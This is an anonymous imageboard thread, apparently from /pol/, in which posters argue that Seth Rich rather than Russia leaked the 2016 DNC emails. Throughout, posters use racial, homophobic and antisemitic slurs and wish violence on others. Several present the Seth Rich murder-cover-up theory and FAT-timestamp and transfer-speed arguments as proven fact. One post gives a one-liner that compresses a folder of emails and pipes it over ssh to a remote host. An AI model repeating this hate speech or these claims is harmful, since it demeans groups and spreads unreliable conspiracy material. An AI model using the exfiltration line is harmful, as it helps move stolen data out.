BUT SETH RICH SETH RICH

GUYS GUYS GUYS I THOUGHT SETH RICH DID IT SETH RICH SETH RICH SETH RICH

you dumb faggots. IT WAS THE RUSSIANS.

Attached: sethrich.png (593x214, 82K)

Other urls found in this thread:

thenation.com/article/a-new-report-raises-big-questions-about-last-years-dnc-hack/
theforensicator.wordpress.com/
turcopolier.typepad.com/sic_semper_tyrannis/2019/02/why-the-dnc-was-not-hacked-by-the-russians.html
youtube.com/watch?v=gOOcGF72bdA
youtu.be/JutE_3PsN_A
twitter.com/SFWRedditImages

according to the released documents, the transfer speed recorded of the files was way too fast to be an external hack; the files were copied via thumb drive or some external hard drive.
it was someone on the inside. Mueller is provably corrupt and has been for decades, going back to protecting Whitey Bulger and the mob in Boston.

what a pathetic attempt to hide the truth

>Mueller is corrupt
>Mueller vindicated Trump
absolute retard

And the Australians and the British and the Israelis and Mexicans.
The greatest troll the deep state ever accomplished was making leftist NPCs into raving neo-McCarthyites.
Remember when Barry mocked Romney about his Russia concerns with "The 1980s wants its foreign policy back"?
It's obscene how malleable you are

There’s a lot of emails schlomo
Im sure the russians hacked some of them
Poor opsec and poor cybersec was part of the reason for the server in the shitter => to enable hax....
B-b-b-but she dindu nuffin man she didn have no criminal intent

>what is face-saving after two years and $100M
One, he's corrupt and two, he didn't have the goods. Hence the le Russians narrative

Attached: The_Hit.jpg (777x429, 219K)

Podesta

>hey guys look what the CIA told the FBI, it must be true because the CIA has never lied or done anything illegal before in its entire history

Attached: CIAball.jpg (830x1020, 341K)

You can’t create evidence he had no choice dummy

Thank goodness all the proof got found and buried inside legal cases that will never be tried ensuring no one will ever see them

Attached: McCainMockingLaughter.jpg (620x350, 17K)

seth rich is living in israel

>the fbi would seek to cover up the murder of an american citizen by us intel community actors
nooo way

>IT WAS THE RUSSIANS.
Bernie Sanders is openly Communist so it's kind of true, in a Washingtonian decades out of date kind of way.
>czechoslovakia

desu even if the Russians did do it, I still hate Shitlibs holding US Passports far more than any Russian Christian. The people that rule America are foreign and are no compatriot of mine and neither are the Orcs that they are flooding my country with.

Spending two years looking for a crime that never happened.
Do you even understand how the justice system is supposed to work.
We don't just investigate people until we find a crime you stupid fucktard.

>Claim without proof made by deep state
Guess that settles it

remember iraq

it's also really amazing how there are so many people that just believe whatever they're told, as long as it's coming from a position of perceived authority.
the literal programming going on is a fucking DISASTER for us, and it's just getting worse. anons have seen it; fucking normie NPC drones calling everyone Russian trolls, regurgitating the same mockingbird talking points from MSNBC, etc.

Attached: 1553356334687.gif (365x298, 1.24M)

REEEE the gov't is corrupt and filled with white supremacists protecting Drumph. read this official doc though.

Two things can be true at the same time you dicklet.

Someone post the forensic analysis behind this

He didn't want to vindicate. He just has nothing to work with.

I really don’t care if the Russians did that. I care what was in the docs and if it was true (it was)

>crickets.mp3

>The special council "concluded" "Russian government actors" "committed an attack on voters."
>evidence to support this: Ethos appeals
I don't see shit, I don't believe shit.
The only shit I see is your post, you stupid fucking faggot. Post proofs or get the fuck out.

that's an interesting finding considering that NOBODY HAS SEEN THE SERVER
EVER

Mueller report is the cover up retard

Redpills needed. Now.

It's ok if illegals and dead people vote in our elections, but "Russians" put up a couple memes on social media and it's a threat to our Democracy.

Fanfic

A witch hunt and an exoneration are not mutually exclusive, retard

>but "Russians" put up a couple memes on social media and it's a threat to our Democracy.
but also not when they buy uranium and pay off a former president and current sec.of state to do it

YEAH THE DICKHEAD LIED ABOUT IT
Assange came right out and named Seth Rich as the source - Mueller and the entire DNC and MSM and all the fucking stupid normie pieces of shit will never have a clue (except the assholes lying on purpose like Mueller and the lib press)
Let's see, someone who has a 100% true reporting record (Assange) or the god damned fbi doj and Dc criminal cabal shitheads - who to believe.... the one who actually knows his own sources, or the lying sacks of shit who screamed falsely collusion for god damned 3 years ?
Hmm... can't make up my mind....

Attached: JON BROWN TRASH CLUB.png (1895x1177, 3.05M)

thenation.com/article/a-new-report-raises-big-questions-about-last-years-dnc-hack/

>On the evening of July 5, 2016, 1,976 megabytes of data were downloaded from the DNC’s server. The operation took 87 seconds. This yields a transfer rate of 22.7 megabytes per second.

god damn those Russians have some fast internet!

this is extremely dangerous to our democracy.

Everybody knows the red-pills worth knowing. If you claim to know nothing about what was referenced you're either a newfag or a glow nigger. Either way, no redpills for you. Check the archives you lazy faggot !

youre a fucking idiot go back to pleddit you arrnt swaying anyones opinion here faggot

his name was seth rich.

Putin could send Russians to Mexico, have them smear themselves in shit, cross the border and get granted citizenship to vote in our elections.

CHECKMATE DEMOCRAPS

>go back to pleddit
>"his name was seth rich"

Attached: rZAbGt4742-10.png (300x250, 35K)

have faith. I hear the fat hacker and DOJ met last week.

Bloody hell that IS fast but not unreal for some cable. I've seen 1.2GB/s downloads from torrents. However, you don't just make a direct fucking connection with a server you're "hacking" if you want to obfuscate your location at all and I find any sort of proxy or bot machine grabbing files that quickly a little unreasonable

>22.7 megabytes per second

try getting that from behind 7 proxies. i'll wait.

This obviously done just to keep sanctions against Russia in place and keep new coming. At least those that related to "election meddling".And maybe also to cover up Clintons and Democratic party as a whole, because if it turned out to be assassination, whole dem party would implode hard, and every current dem politics would have a hard time to keep distance from such disaster. And who knows what else that could bring to light, as they would trying to save themselves or drag others down along with them. It would destroy current deep state regime and greatly change political landscape.

considering how fucking stupid the DNC is i *highly* doubt the location had the ability to upload at that rate. theres no way.

theforensicator.wordpress.com/

and you think transfer to a USB drive is as slow as 22MB/s? bro i've got news for you

Based on the file sizes and modification timestamps of everything supposedly copied from a single directory all at once someone made the estimation that the transfer would have had to have happened across a ~200 to 250mbps line.

Which that 'someone' very fucking stupidly asserted was "impossible" in any scenario except one where an insider has physically connected a usb flash drive to a machine he's attacking.

Google the 'forensicator'. This is literally the one thing he got wrong in his analysis, everything else he did was pretty good work, but for some incomprehensible reason he refuses to admit that a downtown DC office building just _might_ have a better upload rate than whatever he is used to at home, OR the attacker used a pivot (more likely a chain of several) in the process.

It's just weird to him that he thinks a transfer rate over 10mBps is physically impossible.

Assange still says that he knows who hacked the DNC and Hillary e-mails, and it wasn't any state actor. I believe him over the people who used the fake dossier to spy on americans.

not possible. black jesus, i mean obama, said it wasn't possible.

youre a fucking idiot i am a cyber security analyst number one. transfer rates vary based on how many files there are/what size they are. the more files the slower the upload especially if theyre small files.

Both can be true you retard
Mueller accomplished his main mission which was obstructing Trump

common sense is void and absent in brainwashed morons and paid shills. theres no winning a argument against them. theyre fucking retarded

Usb flash drives vary a fucking lot in performance

>the more files the slower the upload especially if theyre small files.
random access disk seeking is not the bottleneck, it's transferring to a USB device or over a network. you'd know that if you were a real security expert and not a LARPing retard. also, USB 2.0 (ancient) transfer speeds are STILL 60MB/s. LOL @ you thinking that random disk seek overheads accounts for a 40+MB/s reduction in transfer speed. nigga u dumb.

If they didn't have access to the servers, which he didn't, he's full of shit.

The feds destroyed the DNC servers aka the evidence aka the scene of the crime.

Guccifer 2.0 = the feds

The transfer rates and FAT file formatting prove the files were moved locally not hacked over the internet.

Fuck your fake news, his name was Seth Rich.

What blows my mind the most about this whole thing is that Americans are mad that Trump isn’t a traitor to the nation. Take the implications of Israel still holding the reins as you will

Attached: 4CF28906-1561-4B99-9DFA-AC6D84F0BACC.jpg (1024x989, 192K)

The fact that there was no evidence to even START an investigation is a travesty of justice. Mueller is corrupt and for sure and on the chopping block, so are the rest of his team. There will be consequences. Now that the investigation is over, Trump can appoint special investigators to do anything he wants.

Attached: francehandexplode.jpg (1581x1080, 141K)

Every home with fiber gets better uploads than that requires. by at least a factor of 2. And the dnc hq is located in downtown DC (last I checked), which is a pretty well connected metropolitan area. You think an enterprise connection is getting something equivalent to your residential cable service?

Put another way, you think the netflixing and youtubing instead of working, drool cup wearing, fucking retards of the dnc would settle for anything less than the highest speed and most overpriced internet service available to them?

That's stuff from hilaries closet server dumbass.

/thread

Rip Seth Rich.

The theory with the "but muh small file overhead" thing is the idea that something like scp gets bogged down negotiating tons of tiny transfers.

That's the theory. Its fucking retarded, but that's the theory.

no nigger youre fucking dumb what was the bandwith for the fucking connection they had can you tell me that? no you fucking cant.

if they were xferd to a fucking USB drive this xfer speed is consistent with a bunch of emails being transferred. dont believe me? copy pasta a bunch of 2 to 5kb files and then transfer them onto a flash drive and watch the transfer rate.

go suck some cock rabbi you fuckin kike

no one knows what connection speed they had. 150Mb/s is a standard business connection nation wide.

Comcast offers 250mbit business lines in the DC area. I mean, look up where the hq is and just see which ISPs (pretty sure its Verizon and comcast) would service it and look at their business line offerings. 250>mbit service is a really fucking safe assumption.

I hope every bone in your shill body is broken and you spasm to death gasping for air.

“The metadata established several facts in this regard with granular precision: On the evening of July 5, 2016, 1,976 megabytes of data were downloaded from the DNC’s server. The operation took 87 seconds. This yields a transfer rate of 22.7 megabytes per second. These statistics are matters of record and essential to disproving the hack theory. No Internet service provider, such as a hacker would have had to use in mid-2016, was capable of downloading data at this speed.”

Did the DNC hand over their servers?

Saddam has mobile chemical weapons factories too.

>gzip -c hillary_emails/* | ssh [email protected] 'cat > /home/putin/hillary_emails.gz'

text compresses crazy good. 1.9GB uncompressed wouldn't take that long on a connection with decent upload speed, if the files were compressed as it was being uploaded

"Something new on metadata of Wikileaks DNC emails. Hard to imagine that it's been overlooked so long. Result checks out from my spot checks. Binney and Larry Johnson report that DNC emails have FAT format and in three batches."

WHY THE DNC WAS NOT HACKED BY THE RUSSIANS

By William Binney, former Technical Director NSA and Larry Johnson, former State CT and CIA

turcopolier.typepad.com/sic_semper_tyrannis/2019/02/why-the-dnc-was-not-hacked-by-the-russians.html

150 up or down?

see:

you usually only get 25-30% of bandwith for uploads.

Notwithstanding the DOJ press release, an examination of the Wikileaks DNC files do not support the claim that the emails were obtained via spearphising. Instead, the evidence clearly shows that the emails posted on the Wikileaks site were copied onto an electronic media, such as a CD-ROM or thumbdrive before they were posted at Wikileaks.
The emails posted on Wikileaks were saved using the File Allocation Table (aka FAT) computer file system architecture.

An examination of the Wikileaks DNC files shows they were created on 23, 25 and 26 May respectively. The fact that they appear in a FAT system format indicates the data was transfered to a storage device, such as a thumb drive.
How do we know? The truth lies in the “last modified” time stamps on the Wikileaks files. Every single one of these time stamps end in even numbers.

If you are not familiar with the FAT file system, you need to understand that when a date is stored under this system the data rounds the time to the nearest even numbered second.

Attached: 6D27516F-C357-4DD5-82D8-5C3E78BA61B5.jpg (750x937, 351K)

No collusion libtard

Theres something called Upload, dumbass. What you are talking about is Download.

And two white guys attacked Jussie Smollet in Chicago saying it was MAGA country, put a noose around his neck, and poured bleach on him. And Pokemon Go cost Hillary the 2016 election:
youtube.com/watch?v=gOOcGF72bdA

OP is a common core retard

Attached: russiahackedyourmind.jpg (1004x484, 428K)

underrated

HIS NAME WAS SETH RICH

There were too many people that knew Trump was innocent.

You seriously trust what our government says about this? Do you believe Oswald was the sole assassin too?

Burger education doesnt know what intermediaries means. That's literally SETH RICH you stupid fuck! He fed Wikileaks and it literals says Russians got it from there!

>Seth rich was the middle man
I fucking knew he was a Russian bot. Some dirty ruskie worked in the DNC headquarters and stole the emails!

Ethernet is way faster than USB 3, though

Attached: Screenshot_20190316-160420.png (1536x2048, 2.68M)

>Russia hacked the wikileaks emails
>Iraq has WMD's

But even Russians can appreciate the refreshing taste of new Orange Vanilla Coke! I'm Putin a case of it in my fridge! Are you?

youtu.be/JutE_3PsN_A

Attached: coca-cola-orange-vanilla.jpg (940x456, 60K)

He just saw someone powerful doing something criminal and tried to expose them without getting killed but Clinton's reach is far too long.

lol. somebody hasn't seen the metadata/timestamps. whole things a fucking mess. not that hard to figure it out. research it for more than 30 minutes.

They need to be hanged from street poles if the people knew the true abuse of authority theyve been subjected too in mass indoctrination rituals of government sanctioned education run by fallen kings and their fake directives. Whether time cops or ancient aliens, the nasa machine dystopian space age of cgi decepticons has to come to a bloody end so that humanity can press on.

>Russians influenced the election by exposing Clinton's illegal activity

Okay, wait. I'm supposed to be upset that a foreign government exposed a presidential candidate as a treasonous slag?

Sorry Mueller, we are gonna need to see broofs.
Because

Attached: 1507285627052 (1).gif (459x258, 3.99M)

Smoking gun

>Hillary directly hired Russian spies to work with her at the DNC and Clinton Foundation

Color me surprised.

it was $eth_Rich - this is just more proof there is only (((one party))) and all this political theatre is a reality show meant to fool you into believing the US has a functioning democracy. muh-russians are (((russians))).

Italy.

The Russians already had absolutely everything but as a matter of protocol it was not acceptable to reveal that they had the meams to gather this data. The only public access to the data was through the insider leak.

Learm to imtelicenge

>Mueller covered the tracks of the Seth Rich assassination

whoa, you're telling me the government won't just come out and admit it carried out a hit job? hmm, really activating my almonds here comrade.
just fucking kill yourself.